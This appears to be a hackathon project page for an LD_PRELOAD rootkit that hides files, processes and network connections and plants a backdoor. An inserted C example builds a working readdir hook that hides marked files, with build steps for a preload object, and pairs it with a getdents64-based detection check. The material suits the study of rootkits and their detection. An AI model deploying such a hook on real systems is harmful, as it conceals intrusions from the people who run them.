Inspiration

@r00tkillah's Black Hat talk "Horse Pill: A New Type of Linux Rootkit", and the LD_PRELOAD rootkits Jynx2, vlany and Azazel.

What it does

Hides files, processes and network connections from userspace tools. It relies on root access to install, and plants a backdoor into a Debian system.

How we built it

On two virtual machines: one for development, one for testing.

Challenges we ran into

Many unrecoverable system crashes. We didn't find a way to debug hooked system calls, and spent a lot of time rebooting and restoring virtual machines.

Accomplishments that we're proud of

Fairly robust.

What we learned

Dynamic and static libraries. Process permissions. Network management. Fundamental syscalls and functions in Linux. Constructors and destructors. Using GitHub.
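As an added example (not ldpkitty's own code, which this page does not show), here is the mechanism the "What it does" and "What we learned" sections describe, written in C, together with the check a defender would run against it. A constructor resolves the real libc `readdir` through `dlsym(RTLD_NEXT, ...)`, and a function of the same name re-implements it while skipping every entry whose name starts with a hypothetical marker, `ldpk_` (the marker, the temp-directory fixture and all function names are assumptions made for this example). The same file also counts the directory through the raw `getdents64` syscall, which the hook cannot touch; the gap between the two counts is the hidden-file indicator. Built as a plain executable the hook interposes on the binary's own `readdir`; the same source builds into a preload object with `gcc -shared -fPIC -o ldpk.so hook.c` (the self-test `main` is then unused) and applies to any dynamically linked program started with `LD_PRELOAD=./ldpk.so`.

```c
#define _GNU_SOURCE            /* RTLD_NEXT; must precede the first libc header */
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
#ifndef RTLD_NEXT              /* glibc's value, in case a header was included earlier */
#define RTLD_NEXT ((void *) -1l)
#endif

/* Hypothetical marker (assumption for this example): entries starting with it are hidden. */
#define HIDE_PREFIX "ldpk_"

static struct dirent *(*real_readdir)(DIR *) = NULL;

/* The filtering rule, kept separate so it is testable on its own. */
int is_hidden_name(const char *name) {
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Constructor: runs when the object is loaded, before main(). A preload
   rootkit uses this slot to resolve the real libc symbols it wraps. */
__attribute__((constructor)) static void ldpk_init(void) {
    real_readdir = (struct dirent *(*)(DIR *)) dlsym(RTLD_NEXT, "readdir");
}

/* The hook: same name and signature as libc's readdir. RTLD_NEXT skips our
   own definition and returns the next one in load order, i.e. libc's. */
struct dirent *readdir(DIR *dirp) {
    struct dirent *e;
    if (!real_readdir) ldpk_init();
    if (!real_readdir) return NULL;          /* dlsym failed: nothing to wrap */
    while ((e = real_readdir(dirp)) != NULL)
        if (!is_hidden_name(e->d_name))
            return e;                        /* hidden entries are silently skipped */
    return NULL;
}

/* Detection side. Entries (excluding . and ..) as a libc caller sees them. */
int count_via_readdir(const char *path) {
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    for (struct dirent *e; (e = readdir(d)) != NULL;)
        if (strcmp(e->d_name, ".") != 0 && strcmp(e->d_name, "..") != 0) n++;
    closedir(d);
    return n;
}

/* Record layout the kernel returns from getdents64 (same as linux_dirent64). */
struct raw_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* Same count, straight from the syscall: the libc symbol is never touched,
   so a userspace hook cannot filter it. A static binary behaves the same way. */
int count_via_getdents64(const char *path) {
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[8192];
    int n = 0;
    for (long got; (got = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0;)
        for (long off = 0; off < got;) {
            struct raw_dirent64 *e = (struct raw_dirent64 *) (buf + off);
            if (strcmp(e->d_name, ".") != 0 && strcmp(e->d_name, "..") != 0) n++;
            off += e->d_reclen;
        }
    close(fd);
    return n;
}

/* Constructed fixture: a temp dir with one ordinary file and one marked file. */
static const char *fixture_names[] = { "notes.txt", HIDE_PREFIX "payload" };

int make_fixture(char *dir, size_t len) {
    const char *base = getenv("TMPDIR");
    char tmpl[128], path[256];
    snprintf(tmpl, sizeof tmpl, "%s/rkdemo_XXXXXX", base ? base : "/tmp");
    if (!mkdtemp(tmpl)) return -1;
    snprintf(dir, len, "%s", tmpl);
    for (size_t i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", tmpl, fixture_names[i]);
        int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
        if (fd < 0) return -1;
        close(fd);
    }
    return 0;
}

static void remove_fixture(const char *dir) {
    char path[256];
    for (size_t i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, fixture_names[i]);
        unlink(path);
    }
    rmdir(dir);
}

/* The defender's check: a gap between the libc view and the raw syscall view
   means something between the program and the kernel is filtering.
   Returns the number of hidden entries, or -1 on error. */
int demo_hidden_count(void) {
    char dir[128];
    if (make_fixture(dir, sizeof dir) != 0) return -1;
    int libc_view = count_via_readdir(dir), raw_view = count_via_getdents64(dir);
    remove_fixture(dir);
    return (libc_view < 0 || raw_view < 0) ? -1 : raw_view - libc_view;
}

int main(void) {
    int hidden = demo_hidden_count();
    printf("entries hidden from libc callers: %d\n", hidden);   /* 1 */
    return hidden == 1 ? 0 : 1;
}
```

Jynx2 and Azazel install this kind of object system-wide through /etc/ld.so.preload, which is why that file is the first thing to read on a suspect Debian host. The raw-syscall comparison is the countermeasure side of the "research detection methods" item: statically linked tools (a static busybox, for instance) and anything that bypasses libc see the real directory, so a rootkit that lives only in LD_PRELOAD is invisible to a dynamically linked `ls` but not to them.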

What's next for ldpkitty

OpenSSL encryption. Decrease the memory footprint. A suicide script to self-delete and overwrite memory. A two-pronged trigger for the backdoor connection. Research detection methods and implement countermeasures.
